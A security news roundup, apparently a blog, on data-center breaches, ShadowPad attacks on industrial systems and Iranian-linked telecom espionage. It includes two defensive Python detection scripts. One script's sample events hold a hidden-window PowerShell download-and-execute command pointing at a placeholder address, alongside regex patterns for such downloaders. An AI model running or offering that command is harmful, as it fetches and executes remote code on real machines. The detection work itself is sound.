
Data Centers Hacked to Collect Data from Multinational Firms

Over the past 18 months there have been reports of cyberattacks against numerous data centers in various parts of the world, leading to the exposure of information belonging to some of the world's largest corporations and the publication of access credentials on the dark web.

Resecurity identified several actors on the dark web, some of whom may be based in Asia, who during the campaign were able to access customer records and exfiltrate them from one or more databases linked to specific applications and systems used by various data center operators.

In at least one case, initial access was probably obtained through a vulnerable helpdesk or ticket-management module that was integrated with other applications and systems, which allowed the threat actor to move laterally.

According to Resecurity, the threat actor was able to harvest credentials belonging to data center IT staff and customers, as well as a list of CCTV cameras and their corresponding video stream identifiers used to monitor the data center environments.

Bloomberg reported that two of the victim companies are GDS Holdings, based in Shanghai, and ST Telemedia Global Data Centres, based in Singapore. Resecurity itself did not name the data center operators affected by the attacks.

According to Bloomberg, GDS acknowledged that a customer support website was compromised in 2021 but insisted that there was no risk to its clients' IT systems or data. ST Telemedia likewise said the incident posed no risk to its clients.

According to Resecurity, the organizations whose information was exposed include global businesses in finance, investment funds, biomedical research, technology vendors, e-commerce, cloud services, ISPs, and content delivery networks. The researchers say the companies are headquartered in the US, UK, Canada, Australia, Switzerland, New Zealand, and China.

Resecurity has not attributed the attacks to any known APT group. The researchers note that multiple, distinct actors may have compromised the victims.

Chinese Hackers Deploy Shadowpad Backdoor to Target Industrial Control Systems in Asia

ShadowPad, a sophisticated and modular backdoor, is back in action. Russian cybersecurity firm Kaspersky has uncovered a series of attacks that targeted unpatched Microsoft Exchange servers in multiple Asian countries.

Researchers initially spotted the ShadowPad backdoor on industrial control systems (ICS) at a telecoms company in Pakistan, where the attackers had targeted engineering computers in building automation systems. Further investigation uncovered broader activity on that network, along with multiple other targeted organizations in Pakistan, Afghanistan, and Malaysia.

"During the initial attacks, the group exploited an MS Exchange vulnerability to deploy ShadowPad malware and infiltrated building automation systems of one of the victims," Kaspersky ICS CERT researcher Kirill Kruglov stated. "By taking control over those systems, the attacker can reach other, even more sensitive systems of the attacked organization." 

"Building automation systems are rare targets for advanced threat actors. However, those systems can be a valuable source of highly confidential information and may provide the attackers with a backdoor to other, more secured, areas of infrastructures." 

Kaspersky, which first detected the activity in mid-October 2021, attributed it to a previously unknown Chinese-speaking threat actor. However, traces left on compromised devices indicate that the campaign began in March 2021, around the time the ProxyLogon vulnerabilities in Exchange Server became public knowledge.

Besides deploying ShadowPad as a file named "mscoree.dll," impersonating a legitimate Microsoft .NET Framework component, the attacks also involved Cobalt Strike, a PlugX variant called THOR, and web shells for remote access. Although the ultimate goal of the campaign remains unknown, the attackers are believed to be interested in long-term intelligence gathering.
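A module masquerading under a well-known system DLL name, as described above, is cheap to hunt for when image-load telemetry is available. The following is an added example (not Kaspersky's or the blog's code) that flags any loaded "mscoree.dll" whose directory or signer does not match the genuine file. It assumes Sysmon Event ID 7 (ImageLoad) records exported as JSON lines with the Image, ImageLoaded, Signed, and Signature fields; the trusted directories and signer name are a hard-coded baseline, and the sample events are constructed for illustration.

```python
"""Hunt for a masqueraded mscoree.dll in Sysmon ImageLoad (Event ID 7) records.

Added example, not code from the original post. Assumptions: events are JSON
lines carrying Sysmon EID 7 fields; the genuine .NET shim lives only in the
directories listed in TRUSTED_DIRS and is signed by Microsoft. The sample
events are constructed, not real telemetry.
"""
import json
import ntpath

# Baseline for the genuine file (assumption; derive from a known-good host in practice).
TRUSTED_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64"}
TRUSTED_SIGNER = "microsoft windows"

# Constructed sample: one legitimate load, two masquerades, one unrelated module.
SAMPLE_EVENTS = "\n".join(json.dumps(e) for e in [
    {"EventID": 7, "Image": r"C:\Windows\System32\svchost.exe",
     "ImageLoaded": r"C:\Windows\System32\mscoree.dll",
     "Signed": "true", "Signature": "Microsoft Windows"},
    {"EventID": 7, "Image": r"C:\Users\Public\AppLaunch.exe",
     "ImageLoaded": r"C:\Users\Public\mscoree.dll",
     "Signed": "false", "Signature": ""},
    {"EventID": 7, "Image": r"C:\ProgramData\Update\AppLaunch.exe",
     "ImageLoaded": r"C:\ProgramData\Update\mscoree.dll",
     "Signed": "true", "Signature": "Contoso Ltd"},
    {"EventID": 7, "Image": r"C:\Windows\System32\notepad.exe",
     "ImageLoaded": r"C:\Windows\System32\kernel32.dll",
     "Signed": "true", "Signature": "Microsoft Windows"},
])


def masquerade_reasons(event):
    """Return the reasons a loaded image looks like a masqueraded mscoree.dll (empty if benign)."""
    if event.get("EventID") != 7:
        return []
    directory, name = ntpath.split(event.get("ImageLoaded", ""))
    if name.lower() != "mscoree.dll":
        return []
    reasons = []
    if directory.lower().rstrip("\\") not in TRUSTED_DIRS:
        reasons.append(f"loaded from unexpected directory {directory}")
    signer = event.get("Signature", "")
    if event.get("Signed", "").lower() != "true":
        reasons.append("image is unsigned")
    elif signer.lower() != TRUSTED_SIGNER:
        reasons.append(f"signed by '{signer}' rather than Microsoft")
    return reasons


def hunt(jsonl):
    """Scan JSON-lines events and return one hit per suspicious mscoree.dll load."""
    hits = []
    for line in jsonl.splitlines():
        if not line.strip():
            continue
        event = json.loads(line)
        reasons = masquerade_reasons(event)
        if reasons:
            hits.append({"process": event.get("Image"),
                         "module": event["ImageLoaded"],
                         "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in hunt(SAMPLE_EVENTS):
        print(f"{hit['process']} -> {hit['module']}")
        for reason in hit["reasons"]:
            print("    ", reason)
```

Both constructed masquerades are caught: the first because it is unsigned and sits in a user-writable directory, the second because the path is wrong even though the file carries a (non-Microsoft) signature. The genuine load from System32 produces no hit, which is the point of checking directory and signer together rather than filename alone.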

ShadowPad, which emerged in 2015 as the successor to PlugX, is a privately sold modular malware platform that has been used by multiple Chinese espionage actors over the years. Its design allows operators to remotely deploy additional plugins that extend its functionality beyond covert data collection, but what makes ShadowPad especially dangerous is the set of anti-forensic and anti-analysis techniques built into the malware.

ShadowPad came to prominence in 2017 through the software supply chain attacks on NetSarang and CCleaner, and was later used in the compromise of the ASUS Live Update utility. The BRONZE ATLAS threat group was blamed for these campaigns. A Microsoft complaint from 2017 and DOJ indictments published in 2020 provide further insight into ShadowPad's relationship to BRONZE ATLAS.

Telecom Industries Targeted by Hackers in Middle East and Asia

According to analysts, the attackers targeting telcos in the Middle East and Asia over the last six months have been linked to Iranian state-sponsored actors. Their cyberespionage tradecraft combines spear phishing, known malware, and legitimate network tools to steal sensitive information and potentially disrupt supply chains.

The analysts detailed their findings in a report released on Tuesday, noting that the attacks also target a range of IT services firms and utility companies. According to the report from the Symantec Threat Hunter Team, part of Broadcom, the attackers appear to gain access to networks via spear phishing and then steal credentials to move laterally.

“Organizations in Israel, Jordan, Kuwait, Saudi Arabia, the United Arab Emirates, Pakistan, Thailand, and Laos were targeted in the campaign, which appears to have made no use of custom malware and instead relied on a mixture of legitimate tools, publicly available malware, and living-off-the-land tactics,” researchers wrote in the report. 

Although the attackers' identities are not confirmed, analysts believe they may be associated with the Iranian group Seedworm, also known as MuddyWater or TEMP.Zagros. In the past this group has conducted large phishing campaigns against organizations in Asia and the Middle East to steal credentials and gain persistence in target networks.

The researchers found two IP addresses used in the operation that had previously been linked to Seedworm activity, along with some tooling overlap, notably SharpChisel and Password Dumper. While there has been earlier Iranian threat activity against telcos in the Middle East and Asia (for instance, the Iranian Chafer APT targeted a major Middle East telco in 2018), a Symantec spokesperson described the activity in the report as "a step up" in focus and a possible harbinger of larger attacks to come.

According to the analysts, a typical attack in the latest campaign began with the attackers penetrating a target network, then stealing credentials to move laterally and deploy web shells on Exchange Servers.

The researchers dissected one attack launched in August against a Middle Eastern telecom provider. In that case, the first sign of intrusion was the creation of a service to execute an unknown Windows Script File (WSF).

The attackers then used scripts to run various domain, user, and remote service discovery commands, and finally used PowerShell to download and execute further files and scripts. According to the analysts, the attackers also used a remote access tool that appeared to query the Exchange Servers of other companies.
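The chain described above (a service created to run a WSF, followed by discovery commands and a PowerShell download) is a good candidate for time-windowed correlation rather than three isolated alerts. The following is an added example, not Symantec's code or any tooling from the report. It assumes Windows events exported as JSON lines with a subset of fields from System Event ID 7045 (service installed) and Security Event ID 4688 (process created), ISO 8601 timestamps, a 30-minute correlation window, and the command patterns shown; the sample events (including the 203.0.113.7 address, which is from a documentation range) are constructed.

```python
"""Correlate service-installed WSF execution with follow-on discovery and PowerShell downloads.

Added example, not code from the original post or from Symantec. Assumptions:
events are JSON lines with 'ts', 'host', 'EventID' and either 'ImagePath' (EID 7045)
or 'CommandLine' (EID 4688); the regexes and the 30-minute window are illustrative
choices. Sample events are constructed.
"""
import json
import re
from collections import defaultdict
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=30)

# Stage 1: a new service whose binary path hands a .wsf to a script host.
SERVICE_WSF = re.compile(r"\b(wscript|cscript)(\.exe)?\b.*\.wsf\b", re.I)
# Stage 2: host and domain discovery commands typical of hands-on-keyboard activity.
DISCOVERY = re.compile(r"\b(net\s+(user|group|view)|nltest|whoami|query\s+user|"
                       r"systeminfo|ipconfig|tasklist)\b", re.I)
# Stage 3: PowerShell used as a downloader.
PS_DOWNLOAD = re.compile(r"powershell.*(downloadstring|downloadfile|invoke-webrequest|"
                         r"\biwr\b|net\.webclient|bitstransfer)", re.I)

# Constructed sample: one full chain on MAIL01, one benign service install on WS22.
SAMPLE_EVENTS = "\n".join(json.dumps(e) for e in [
    {"ts": "2021-08-10T09:00:12", "host": "MAIL01", "EventID": 7045,
     "ServiceName": "WinUpdateSvc",
     "ImagePath": r"cmd.exe /c wscript.exe C:\Windows\Temp\upd.wsf"},
    {"ts": "2021-08-10T09:01:30", "host": "MAIL01", "EventID": 4688,
     "CommandLine": 'net group "Domain Admins" /domain'},
    {"ts": "2021-08-10T09:01:41", "host": "MAIL01", "EventID": 4688,
     "CommandLine": "nltest /dclist:corp"},
    {"ts": "2021-08-10T09:02:05", "host": "MAIL01", "EventID": 4688,
     "CommandLine": "whoami /all"},
    {"ts": "2021-08-10T09:04:50", "host": "MAIL01", "EventID": 4688,
     "CommandLine": "powershell -nop -w hidden -c IEX (New-Object Net.WebClient)"
                    ".DownloadString('http://203.0.113.7/a.ps1')"},
    {"ts": "2021-08-10T11:15:00", "host": "WS22", "EventID": 7045,
     "ServiceName": "Backup Agent",
     "ImagePath": r"C:\Program Files\Backup\agent.exe"},
    {"ts": "2021-08-10T11:16:00", "host": "WS22", "EventID": 4688,
     "CommandLine": "ipconfig /all"},
])


def correlate(jsonl):
    """Return one finding per suspicious service install, with the follow-on activity seen in WINDOW."""
    by_host = defaultdict(list)
    for line in jsonl.splitlines():
        if line.strip():
            event = json.loads(line)
            event["ts"] = datetime.fromisoformat(event["ts"])
            by_host[event["host"]].append(event)

    findings = []
    for host, events in by_host.items():
        events.sort(key=lambda e: e["ts"])
        for svc in events:
            if svc["EventID"] != 7045 or not SERVICE_WSF.search(svc.get("ImagePath", "")):
                continue
            later = [e for e in events
                     if e["EventID"] == 4688 and svc["ts"] <= e["ts"] <= svc["ts"] + WINDOW]
            discovery = [e["CommandLine"] for e in later
                         if DISCOVERY.search(e.get("CommandLine", ""))]
            downloads = [e["CommandLine"] for e in later
                         if PS_DOWNLOAD.search(e.get("CommandLine", ""))]
            # Stage 1 alone is worth a look; each further stage raises confidence (max 3).
            score = 1 + int(len(discovery) >= 2) + int(bool(downloads))
            findings.append({"host": host, "service": svc.get("ServiceName"),
                             "image_path": svc["ImagePath"], "discovery": discovery,
                             "downloads": downloads, "score": score})
    return findings


if __name__ == "__main__":
    for f in correlate(SAMPLE_EVENTS):
        print(f"[{f['score']}/3] {f['host']} service '{f['service']}': {f['image_path']}")
        for cmd in f["discovery"] + f["downloads"]:
            print("    ", cmd)
```

Only MAIL01 produces a finding, at full score: the benign "Backup Agent" service on WS22 never matches the script-host pattern, so its later ipconfig is never considered. Scoring per stage, rather than alerting on any single regex, keeps routine discovery commands from an administrator out of the queue while still surfacing a lone WSF-launching service for review.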

According to the researchers, the attackers were interested in using some compromised companies as stepping stones, or in targeting organizations beyond the initial victim in order to mount a supply-chain attack.

“A suspected ScreenConnect setup MSI appeared to have been delivered in a zipped file named ‘Special discount program.zip,’ suggesting that it arrived in a spear-phishing email,” they wrote.